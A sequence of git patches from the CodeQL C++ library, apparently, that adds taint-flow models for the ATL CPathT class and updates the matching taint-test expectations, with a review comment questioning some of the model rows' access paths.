@@ -636,92 +636,170 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:524:16:524:21 | call to CComBSTR | atl.cpp:525:10:525:10 | b | | | atl.cpp:524:16:524:21 | call to CComBSTR | atl.cpp:526:3:526:3 | b | | | atl.cpp:525:10:525:10 | b [post update] | atl.cpp:526:3:526:3 | b | | -| atl.cpp:569:22:569:33 | call to getSafeArray | atl.cpp:570:8:570:11 | safe | | -| atl.cpp:569:22:569:33 | call to getSafeArray | atl.cpp:572:24:572:27 | safe | | -| atl.cpp:569:22:569:33 | call to getSafeArray | atl.cpp:582:11:582:14 | safe | | -| atl.cpp:570:8:570:11 | safe [post update] | atl.cpp:572:24:572:27 | safe | | -| atl.cpp:570:8:570:11 | safe [post update] | atl.cpp:582:11:582:14 | safe | | -| atl.cpp:572:24:572:27 | safe | atl.cpp:572:24:572:28 | call to CComSafeArray | TAINT | -| atl.cpp:572:24:572:28 | call to CComSafeArray | atl.cpp:573:8:573:8 | c | | -| atl.cpp:572:24:572:28 | call to CComSafeArray | atl.cpp:574:8:574:8 | c | | -| atl.cpp:572:24:572:28 | call to CComSafeArray | atl.cpp:575:8:575:8 | c | | -| atl.cpp:572:24:572:28 | call to CComSafeArray | atl.cpp:576:3:576:3 | c | | -| atl.cpp:573:8:573:8 | ref arg c | atl.cpp:574:8:574:8 | c | | -| atl.cpp:573:8:573:8 | ref arg c | atl.cpp:575:8:575:8 | c | | -| atl.cpp:573:8:573:8 | ref arg c | atl.cpp:576:3:576:3 | c | | -| atl.cpp:574:8:574:8 | ref arg c | atl.cpp:575:8:575:8 | c | | -| atl.cpp:574:8:574:8 | ref arg c | atl.cpp:576:3:576:3 | c | | -| atl.cpp:575:8:575:8 | ref arg c | atl.cpp:576:3:576:3 | c | | -| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:579:10:579:10 | c | | -| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:580:10:580:10 | c | | -| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:581:10:581:10 | c | | -| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:582:5:582:5 | c | | -| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:583:10:583:10 | c | | -| atl.cpp:578:24:578:24 | call to CComSafeArray | 
atl.cpp:584:10:584:10 | c | | -| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:585:10:585:10 | c | | -| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:586:35:586:35 | c | | -| atl.cpp:578:24:578:24 | call to CComSafeArray | atl.cpp:587:3:587:3 | c | | -| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:580:10:580:10 | c | | -| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:581:10:581:10 | c | | -| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:582:5:582:5 | c | | -| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:583:10:583:10 | c | | -| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:584:10:584:10 | c | | -| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:585:10:585:10 | c | | -| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:586:35:586:35 | c | | -| atl.cpp:579:10:579:10 | ref arg c | atl.cpp:587:3:587:3 | c | | -| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:581:10:581:10 | c | | -| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:582:5:582:5 | c | | -| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:583:10:583:10 | c | | -| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:584:10:584:10 | c | | -| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:585:10:585:10 | c | | -| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:586:35:586:35 | c | | -| atl.cpp:580:10:580:10 | ref arg c | atl.cpp:587:3:587:3 | c | | -| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:582:5:582:5 | c | | -| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:583:10:583:10 | c | | -| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:584:10:584:10 | c | | -| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:585:10:585:10 | c | | -| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:586:35:586:35 | c | | -| atl.cpp:581:10:581:10 | ref arg c | atl.cpp:587:3:587:3 | c | | -| atl.cpp:582:5:582:5 | ref arg c | atl.cpp:583:10:583:10 | c | | -| atl.cpp:582:5:582:5 | ref arg c | atl.cpp:584:10:584:10 | c | | -| atl.cpp:582:5:582:5 | ref arg c | atl.cpp:585:10:585:10 | c | | -| atl.cpp:582:5:582:5 | ref arg c | atl.cpp:586:35:586:35 | c | | -| atl.cpp:582:5:582:5 
| ref arg c | atl.cpp:587:3:587:3 | c | | +| atl.cpp:571:22:571:33 | call to getSafeArray | atl.cpp:572:8:572:11 | safe | | +| atl.cpp:571:22:571:33 | call to getSafeArray | atl.cpp:574:24:574:27 | safe | | +| atl.cpp:571:22:571:33 | call to getSafeArray | atl.cpp:585:11:585:14 | safe | | +| atl.cpp:572:8:572:11 | safe [post update] | atl.cpp:574:24:574:27 | safe | | +| atl.cpp:572:8:572:11 | safe [post update] | atl.cpp:585:11:585:14 | safe | | +| atl.cpp:574:24:574:27 | safe | atl.cpp:574:24:574:28 | call to CComSafeArray | TAINT | +| atl.cpp:574:24:574:28 | call to CComSafeArray | atl.cpp:575:8:575:8 | c | | +| atl.cpp:574:24:574:28 | call to CComSafeArray | atl.cpp:576:8:576:8 | c | | +| atl.cpp:574:24:574:28 | call to CComSafeArray | atl.cpp:577:8:577:8 | c | | +| atl.cpp:574:24:574:28 | call to CComSafeArray | atl.cpp:578:8:578:8 | c | | +| atl.cpp:574:24:574:28 | call to CComSafeArray | atl.cpp:579:3:579:3 | c | | +| atl.cpp:575:8:575:8 | ref arg c | atl.cpp:576:8:576:8 | c | | +| atl.cpp:575:8:575:8 | ref arg c | atl.cpp:577:8:577:8 | c | | +| atl.cpp:575:8:575:8 | ref arg c | atl.cpp:578:8:578:8 | c | | +| atl.cpp:575:8:575:8 | ref arg c | atl.cpp:579:3:579:3 | c | | +| atl.cpp:576:8:576:8 | ref arg c | atl.cpp:577:8:577:8 | c | | +| atl.cpp:576:8:576:8 | ref arg c | atl.cpp:578:8:578:8 | c | | +| atl.cpp:576:8:576:8 | ref arg c | atl.cpp:579:3:579:3 | c | | +| atl.cpp:577:8:577:8 | ref arg c | atl.cpp:578:8:578:8 | c | | +| atl.cpp:577:8:577:8 | ref arg c | atl.cpp:579:3:579:3 | c | | +| atl.cpp:578:8:578:8 | c [post update] | atl.cpp:579:3:579:3 | c | | +| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:582:10:582:10 | c | | +| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:583:10:583:10 | c | | +| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:584:10:584:10 | c | | +| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:585:5:585:5 | c | | +| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:586:10:586:10 | c | | +| 
atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:587:10:587:10 | c | | +| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:588:10:588:10 | c | | +| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:589:35:589:35 | c | | +| atl.cpp:581:24:581:24 | call to CComSafeArray | atl.cpp:590:3:590:3 | c | | +| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:583:10:583:10 | c | | +| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:584:10:584:10 | c | | +| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:585:5:585:5 | c | | +| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:586:10:586:10 | c | | +| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:587:10:587:10 | c | | +| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:588:10:588:10 | c | | +| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:589:35:589:35 | c | | +| atl.cpp:582:10:582:10 | ref arg c | atl.cpp:590:3:590:3 | c | | | atl.cpp:583:10:583:10 | ref arg c | atl.cpp:584:10:584:10 | c | | -| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:585:10:585:10 | c | | -| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:586:35:586:35 | c | | -| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:587:3:587:3 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:585:10:585:10 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:586:35:586:35 | c | | -| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:587:3:587:3 | c | | -| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:586:35:586:35 | c | | -| atl.cpp:585:10:585:10 | ref arg c | atl.cpp:587:3:587:3 | c | | -| atl.cpp:586:35:586:35 | ref arg c | atl.cpp:587:3:587:3 | c | | -| atl.cpp:589:24:589:24 | call to CComSafeArray | atl.cpp:590:5:590:5 | c | | -| atl.cpp:589:24:589:24 | call to CComSafeArray | atl.cpp:591:10:591:10 | c | | -| atl.cpp:589:24:589:24 | call to CComSafeArray | atl.cpp:592:10:592:10 | c | | -| atl.cpp:589:24:589:24 | call to CComSafeArray | atl.cpp:593:10:593:10 | c | | -| atl.cpp:589:24:589:24 | call to CComSafeArray | atl.cpp:594:3:594:3 | c | | -| atl.cpp:590:5:590:5 | ref arg c | 
atl.cpp:591:10:591:10 | c | | -| atl.cpp:590:5:590:5 | ref arg c | atl.cpp:592:10:592:10 | c | | -| atl.cpp:590:5:590:5 | ref arg c | atl.cpp:593:10:593:10 | c | | -| atl.cpp:590:5:590:5 | ref arg c | atl.cpp:594:3:594:3 | c | | -| atl.cpp:591:10:591:10 | ref arg c | atl.cpp:592:10:592:10 | c | | -| atl.cpp:591:10:591:10 | ref arg c | atl.cpp:593:10:593:10 | c | | -| atl.cpp:591:10:591:10 | ref arg c | atl.cpp:594:3:594:3 | c | | -| atl.cpp:592:10:592:10 | ref arg c | atl.cpp:593:10:593:10 | c | | -| atl.cpp:592:10:592:10 | ref arg c | atl.cpp:594:3:594:3 | c | | -| atl.cpp:593:10:593:10 | ref arg c | atl.cpp:594:3:594:3 | c | | -| atl.cpp:596:24:596:24 | call to CComSafeArray | atl.cpp:597:5:597:5 | c | | -| atl.cpp:596:24:596:24 | call to CComSafeArray | atl.cpp:598:10:598:10 | c | | -| atl.cpp:596:24:596:24 | call to CComSafeArray | atl.cpp:599:10:599:10 | c | | -| atl.cpp:596:24:596:24 | call to CComSafeArray | atl.cpp:600:3:600:3 | c | | -| atl.cpp:597:5:597:5 | ref arg c | atl.cpp:598:10:598:10 | c | | -| atl.cpp:597:5:597:5 | ref arg c | atl.cpp:599:10:599:10 | c | | -| atl.cpp:597:5:597:5 | ref arg c | atl.cpp:600:3:600:3 | c | | -| atl.cpp:598:10:598:10 | ref arg c | atl.cpp:599:10:599:10 | c | | -| atl.cpp:598:10:598:10 | ref arg c | atl.cpp:600:3:600:3 | c | | -| atl.cpp:599:10:599:10 | ref arg c | atl.cpp:600:3:600:3 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:585:5:585:5 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:586:10:586:10 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:587:10:587:10 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:588:10:588:10 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:589:35:589:35 | c | | +| atl.cpp:583:10:583:10 | ref arg c | atl.cpp:590:3:590:3 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:585:5:585:5 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:586:10:586:10 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:587:10:587:10 | c | | +| atl.cpp:584:10:584:10 
| ref arg c | atl.cpp:588:10:588:10 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:589:35:589:35 | c | | +| atl.cpp:584:10:584:10 | ref arg c | atl.cpp:590:3:590:3 | c | | +| atl.cpp:585:5:585:5 | ref arg c | atl.cpp:586:10:586:10 | c | | +| atl.cpp:585:5:585:5 | ref arg c | atl.cpp:587:10:587:10 | c | | +| atl.cpp:585:5:585:5 | ref arg c | atl.cpp:588:10:588:10 | c | | +| atl.cpp:585:5:585:5 | ref arg c | atl.cpp:589:35:589:35 | c | | +| atl.cpp:585:5:585:5 | ref arg c | atl.cpp:590:3:590:3 | c | | +| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:587:10:587:10 | c | | +| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:588:10:588:10 | c | | +| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:589:35:589:35 | c | | +| atl.cpp:586:10:586:10 | ref arg c | atl.cpp:590:3:590:3 | c | | +| atl.cpp:587:10:587:10 | ref arg c | atl.cpp:588:10:588:10 | c | | +| atl.cpp:587:10:587:10 | ref arg c | atl.cpp:589:35:589:35 | c | | +| atl.cpp:587:10:587:10 | ref arg c | atl.cpp:590:3:590:3 | c | | +| atl.cpp:588:10:588:10 | ref arg c | atl.cpp:589:35:589:35 | c | | +| atl.cpp:588:10:588:10 | ref arg c | atl.cpp:590:3:590:3 | c | | +| atl.cpp:589:35:589:35 | ref arg c | atl.cpp:590:3:590:3 | c | | +| atl.cpp:592:24:592:24 | call to CComSafeArray | atl.cpp:593:5:593:5 | c | | +| atl.cpp:592:24:592:24 | call to CComSafeArray | atl.cpp:594:10:594:10 | c | | +| atl.cpp:592:24:592:24 | call to CComSafeArray | atl.cpp:595:10:595:10 | c | | +| atl.cpp:592:24:592:24 | call to CComSafeArray | atl.cpp:596:10:596:10 | c | | +| atl.cpp:592:24:592:24 | call to CComSafeArray | atl.cpp:597:3:597:3 | c | | +| atl.cpp:593:5:593:5 | ref arg c | atl.cpp:594:10:594:10 | c | | +| atl.cpp:593:5:593:5 | ref arg c | atl.cpp:595:10:595:10 | c | | +| atl.cpp:593:5:593:5 | ref arg c | atl.cpp:596:10:596:10 | c | | +| atl.cpp:593:5:593:5 | ref arg c | atl.cpp:597:3:597:3 | c | | +| atl.cpp:594:10:594:10 | ref arg c | atl.cpp:595:10:595:10 | c | | +| atl.cpp:594:10:594:10 | ref arg c | atl.cpp:596:10:596:10 | c | | 
+| atl.cpp:594:10:594:10 | ref arg c | atl.cpp:597:3:597:3 | c | | +| atl.cpp:595:10:595:10 | ref arg c | atl.cpp:596:10:596:10 | c | | +| atl.cpp:595:10:595:10 | ref arg c | atl.cpp:597:3:597:3 | c | | +| atl.cpp:596:10:596:10 | ref arg c | atl.cpp:597:3:597:3 | c | | +| atl.cpp:599:24:599:24 | call to CComSafeArray | atl.cpp:600:5:600:5 | c | | +| atl.cpp:599:24:599:24 | call to CComSafeArray | atl.cpp:601:10:601:10 | c | | +| atl.cpp:599:24:599:24 | call to CComSafeArray | atl.cpp:602:10:602:10 | c | | +| atl.cpp:599:24:599:24 | call to CComSafeArray | atl.cpp:603:3:603:3 | c | | +| atl.cpp:600:5:600:5 | ref arg c | atl.cpp:601:10:601:10 | c | | +| atl.cpp:600:5:600:5 | ref arg c | atl.cpp:602:10:602:10 | c | | +| atl.cpp:600:5:600:5 | ref arg c | atl.cpp:603:3:603:3 | c | | +| atl.cpp:601:10:601:10 | ref arg c | atl.cpp:602:10:602:10 | c | | +| atl.cpp:601:10:601:10 | ref arg c | atl.cpp:603:3:603:3 | c | | +| atl.cpp:602:10:602:10 | ref arg c | atl.cpp:603:3:603:3 | c | | +| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:665:11:665:11 | x | | +| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:674:20:674:20 | x | | +| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:679:14:679:14 | x | | +| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:687:11:687:11 | x | | +| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:693:15:693:15 | x | | +| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:698:24:698:24 | x | | +| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:704:30:704:30 | x | | +| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:674:20:674:20 | x | | +| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:679:14:679:14 | x | | +| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:687:11:687:11 | x | | +| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:693:15:693:15 | x | | +| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:698:24:698:24 | x | | +| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:704:30:704:30 | x | | +| 
atl.cpp:665:11:665:11 | x | atl.cpp:665:11:665:12 | call to CPathT | TAINT | +| atl.cpp:665:11:665:12 | call to CPathT | atl.cpp:666:27:666:27 | p | | +| atl.cpp:665:11:665:12 | call to CPathT | atl.cpp:667:8:667:8 | p | | +| atl.cpp:665:11:665:12 | call to CPathT | atl.cpp:669:12:669:12 | p | | +| atl.cpp:666:27:666:27 | ref arg p | atl.cpp:667:8:667:8 | p | | +| atl.cpp:666:27:666:27 | ref arg p | atl.cpp:669:12:669:12 | p | | +| atl.cpp:667:8:667:8 | p [post update] | atl.cpp:669:12:669:12 | p | | +| atl.cpp:667:10:667:18 | ref arg m_strPath | atl.cpp:670:11:670:19 | m_strPath | | +| atl.cpp:669:12:669:12 | p | atl.cpp:669:12:669:13 | call to CPathT | | +| atl.cpp:669:12:669:13 | call to CPathT | atl.cpp:670:8:670:9 | p2 | | +| atl.cpp:673:11:673:11 | call to CPathT | atl.cpp:674:5:674:5 | p | | +| atl.cpp:673:11:673:11 | call to CPathT | atl.cpp:675:10:675:10 | p | | +| atl.cpp:674:5:674:5 | ref arg p | atl.cpp:675:10:675:10 | p | | +| atl.cpp:674:20:674:20 | ref arg x | atl.cpp:679:14:679:14 | x | | +| atl.cpp:674:20:674:20 | ref arg x | atl.cpp:687:11:687:11 | x | | +| atl.cpp:674:20:674:20 | ref arg x | atl.cpp:693:15:693:15 | x | | +| atl.cpp:674:20:674:20 | ref arg x | atl.cpp:698:24:698:24 | x | | +| atl.cpp:674:20:674:20 | ref arg x | atl.cpp:704:30:704:30 | x | | +| atl.cpp:678:11:678:11 | call to CPathT | atl.cpp:679:5:679:5 | p | | +| atl.cpp:678:11:678:11 | call to CPathT | atl.cpp:680:10:680:10 | p | | +| atl.cpp:678:11:678:11 | call to CPathT | atl.cpp:683:11:683:11 | p | | +| atl.cpp:678:11:678:11 | call to CPathT | atl.cpp:684:10:684:10 | p | | +| atl.cpp:678:11:678:11 | call to CPathT | atl.cpp:688:10:688:10 | p | | +| atl.cpp:679:5:679:5 | ref arg p | atl.cpp:680:10:680:10 | p | | +| atl.cpp:679:5:679:5 | ref arg p | atl.cpp:683:11:683:11 | p | | +| atl.cpp:679:5:679:5 | ref arg p | atl.cpp:684:10:684:10 | p | | +| atl.cpp:679:5:679:5 | ref arg p | atl.cpp:688:10:688:10 | p | | +| atl.cpp:679:14:679:14 | ref arg x | atl.cpp:687:11:687:11 | x | 
| +| atl.cpp:679:14:679:14 | ref arg x | atl.cpp:693:15:693:15 | x | | +| atl.cpp:679:14:679:14 | ref arg x | atl.cpp:698:24:698:24 | x | | +| atl.cpp:679:14:679:14 | ref arg x | atl.cpp:704:30:704:30 | x | | +| atl.cpp:680:10:680:10 | p [post update] | atl.cpp:683:11:683:11 | p | | +| atl.cpp:680:10:680:10 | p [post update] | atl.cpp:684:10:684:10 | p | | +| atl.cpp:680:10:680:10 | p [post update] | atl.cpp:688:10:688:10 | p | | +| atl.cpp:680:12:680:20 | ref arg m_strPath | atl.cpp:684:12:684:20 | m_strPath | | +| atl.cpp:680:12:680:20 | ref arg m_strPath | atl.cpp:688:12:688:20 | m_strPath | | +| atl.cpp:682:11:682:12 | call to CPathT | atl.cpp:683:5:683:6 | p2 | | +| atl.cpp:683:11:683:11 | call to operator char *& | atl.cpp:683:8:683:8 | call to operator+= | TAINT | +| atl.cpp:683:11:683:11 | ref arg p | atl.cpp:684:10:684:10 | p | | +| atl.cpp:683:11:683:11 | ref arg p | atl.cpp:688:10:688:10 | p | | +| atl.cpp:684:10:684:10 | p [post update] | atl.cpp:688:10:688:10 | p | | +| atl.cpp:684:12:684:20 | ref arg m_strPath | atl.cpp:688:12:688:20 | m_strPath | | +| atl.cpp:686:11:686:12 | call to CPathT | atl.cpp:687:5:687:6 | p3 | | +| atl.cpp:687:11:687:11 | ref arg x | atl.cpp:693:15:693:15 | x | | +| atl.cpp:687:11:687:11 | ref arg x | atl.cpp:698:24:698:24 | x | | +| atl.cpp:687:11:687:11 | ref arg x | atl.cpp:704:30:704:30 | x | | +| atl.cpp:687:11:687:11 | x | atl.cpp:687:8:687:8 | call to operator+= | TAINT | +| atl.cpp:692:11:692:11 | call to CPathT | atl.cpp:693:5:693:5 | p | | +| atl.cpp:692:11:692:11 | call to CPathT | atl.cpp:694:10:694:10 | p | | +| atl.cpp:693:5:693:5 | ref arg p | atl.cpp:694:10:694:10 | p | | +| atl.cpp:693:15:693:15 | ref arg x | atl.cpp:698:24:698:24 | x | | +| atl.cpp:693:15:693:15 | ref arg x | atl.cpp:704:30:704:30 | x | | +| atl.cpp:697:11:697:11 | call to CPathT | atl.cpp:698:5:698:5 | p | | +| atl.cpp:697:11:697:11 | call to CPathT | atl.cpp:699:10:699:10 | p | | +| atl.cpp:698:5:698:5 | ref arg p | atl.cpp:699:10:699:10 | 
p | | +| atl.cpp:698:24:698:24 | ref arg x | atl.cpp:704:30:704:30 | x | | +| atl.cpp:703:11:703:11 | call to CPathT | atl.cpp:704:15:704:15 | p | | +| atl.cpp:704:17:704:28 | call to CommonPrefix | atl.cpp:705:10:705:11 | p2 | | +| atl.cpp:704:17:704:28 | call to CommonPrefix | atl.cpp:706:10:706:11 | p2 | | +| atl.cpp:705:10:705:11 | p2 [post update] | atl.cpp:706:10:706:11 | p2 | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | From 354361952ac6d4e8571a7b06e0f487c93fb7070b Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 14:15:17 +0000 Subject: [PATCH 0734/1267] C++: Add MaD model for 'CPathT'. --- cpp/ql/lib/ext/CPathT.model.yml | 22 +++++++++++++++++++ .../dataflow/taint-tests/atl.cpp | 2 +- 2 files changed, 23 insertions(+), 1 deletion(-) create mode 100644 cpp/ql/lib/ext/CPathT.model.yml diff --git a/cpp/ql/lib/ext/CPathT.model.yml b/cpp/ql/lib/ext/CPathT.model.yml new file mode 100644 index 00000000000..2138dd6c942 --- /dev/null +++ b/cpp/ql/lib/ext/CPathT.model.yml 
@@ -0,0 +1,22 @@
+extensions:
+ - addsTo:
+ pack: codeql/cpp-all
+ extensible: summaryModel
+ data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance
+ - ["", "CPathT", True, "CPathT", "", "", "Argument[*1]", "Argument[-1]", "value", "manual"]
+ - ["", "CPathT", True, "AddExtension", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"]
+ - ["", "CPathT", True, "Append", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"]
+ - ["", "CPathT", True, "Combine", "", "", "Argument[*0]", "Argument[-1]", "taint", "manual"]
+ - ["", "CPathT", True, "Combine", "", "", "Argument[*1]", "Argument[-1]", "taint", "manual"]
+ - ["", "CPathT", True, "CommonPrefix", "", "", "Argument[*0]", "ReturnValue", "taint", "manual"]
+ - ["", "CPathT", True, "CommonPrefix", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"]
+ - ["", "CPathT", True, "GetExtension", "", "", "Argument[-1]", "ReturnValue[*]", "taint", "manual"]
+ - ["", "CPathT", True, "RelativePathTo", "", "", "Argument[*0]", "ReturnValue[-1]", "taint", "manual"]
+ - ["", "CPathT", True, "RelativePathTo", "", "", "Argument[*2]", "ReturnValue[-1]", "taint", "manual"]
+ - ["", "CPathT", True, "RenameExtension", "", "", "Argument[*0]", "ReturnValue[-1]", "taint", "manual"]
+ # Note: These don't work currently since we cannot use the template parameter in the name of the function
+ # - ["", "CPathT", True, "operator const T&", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"]
+ # - ["", "CPathT", True, "operator T&", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"]
+ - ["", "CPathT", True, "operator PCXSTR", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"]
+ - ["", "CPathT", True, "operator +=", "", "", "Argument[-1]", "ReturnValue[*]", "value", "manual"]
+ - ["", "CPathT", True, "operator +=", "", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"]
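Review bot: The `RelativePathTo` and `RenameExtension` rows name `ReturnValue[-1]` as their output, which does not look like a valid access path; both methods return `BOOL` in the atl.cpp stub and update the path object, so the intended target is presumably the qualifier, `"Argument[-1]"`. The constructor row reads from `Argument[*1]`, but both non-default `CPathT` constructors declared in the stub take a single parameter, so this is probably meant to be `Argument[*0]`, as in the CComSafeArray model. The two `"operator +="` rows are spelled with a space, unlike `"operator="` and `"operator[]"` in the CComSafeArray model, and they write only to `ReturnValue[*]`, never to the qualifier. Rows that fail to match are silent, and the only symptom is taint that stops at the call, so each of these needs a test expectation that would fail without it.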
diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 35a66099a62..d6b7b6d2d6f 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -703,6 +703,6 @@ void test_CPathT() { CPath p; auto p2 = p.CommonPrefix(x); sink(p2.m_strPath); // $ MISSING: ir - sink(p2.GetExtension()); // $ MISSING: ir + sink(p2.GetExtension()); // $ ir } } From c61395b9733b1236d05026030378260100a04586 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 14:18:16 +0000 Subject: [PATCH 0735/1267] C++: Add implicit read of the 'm_strPath' member. --- cpp/ql/lib/semmle/code/cpp/models/Models.qll | 1 + .../code/cpp/models/implementations/CPathT.qll | 16 ++++++++++++++++ .../library-tests/dataflow/taint-tests/atl.cpp | 18 +++++++++--------- 3 files changed, 26 insertions(+), 9 deletions(-) create mode 100644 cpp/ql/lib/semmle/code/cpp/models/implementations/CPathT.qll diff --git a/cpp/ql/lib/semmle/code/cpp/models/Models.qll b/cpp/ql/lib/semmle/code/cpp/models/Models.qll index 9e67eaae5cf..b371e6dc116 100644 --- a/cpp/ql/lib/semmle/code/cpp/models/Models.qll +++ b/cpp/ql/lib/semmle/code/cpp/models/Models.qll @@ -52,3 +52,4 @@ private import implementations.ZMQ private import implementations.Win32CommandExecution private import implementations.CA2AEX private import implementations.CComBSTR +private import implementations.CPathT diff --git a/cpp/ql/lib/semmle/code/cpp/models/implementations/CPathT.qll b/cpp/ql/lib/semmle/code/cpp/models/implementations/CPathT.qll new file mode 100644 index 00000000000..b2fe3a363c7 --- /dev/null +++ b/cpp/ql/lib/semmle/code/cpp/models/implementations/CPathT.qll 
@@ -0,0 +1,16 @@ +private import cpp +private import semmle.code.cpp.ir.dataflow.FlowSteps +private import semmle.code.cpp.dataflow.new.DataFlow + +/** The `CPathT` class from the Microsoft "Active Template Library". */ +class CPathT extends Class { + CPathT() { this.hasGlobalName("CPathT") } +} + +private class MStrPath extends Field { + MStrPath() { this.getDeclaringType() instanceof CPathT and this.hasName("m_strPath") } +} + +private class MStrPathTaintInheritingContent extends TaintInheritingContent, DataFlow::FieldContent { + MStrPathTaintInheritingContent() { this.getField() instanceof MStrPath } +} diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index d6b7b6d2d6f..46a147e555a 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -664,45 +664,45 @@ void test_CPathT() { char* x = indirect_source(); CPath p(x); sink(static_cast(p)); // $ MISSING: ir - sink(p.m_strPath); // $ MISSING: ir + sink(p.m_strPath); // $ ir CPath p2(p); - sink(p2.m_strPath); // $ MISSING: ir + sink(p2.m_strPath); // $ ir { CPath p; p.AddExtension(x); - sink(p.m_strPath); // $ MISSING: ir + sink(p.m_strPath); // $ ir } { CPath p; p.Append(x); - sink(p.m_strPath); // $ MISSING: ir + sink(p.m_strPath); // $ ir CPath p2; p2 += p; - sink(p.m_strPath); // $ MISSING: ir + sink(p.m_strPath); // $ ir CPath p3; p3 += x; - sink(p.m_strPath); // $ MISSING: ir + sink(p.m_strPath); // $ ir } { CPath p; p.Combine(x, nullptr); - sink(p.m_strPath); // $ MISSING: ir + sink(p.m_strPath); // $ ir } { CPath p; p.Combine(nullptr, x); - sink(p.m_strPath); // $ MISSING: ir + sink(p.m_strPath); // $ ir } { CPath p; auto p2 = p.CommonPrefix(x); - sink(p2.m_strPath); // $ MISSING: ir + sink(p2.m_strPath); // $ ir sink(p2.GetExtension()); // $ ir } } From 029c0134eba01f629b1a0e7ffba4d98fb093ccef Mon Sep 17 00:00:00 2001 
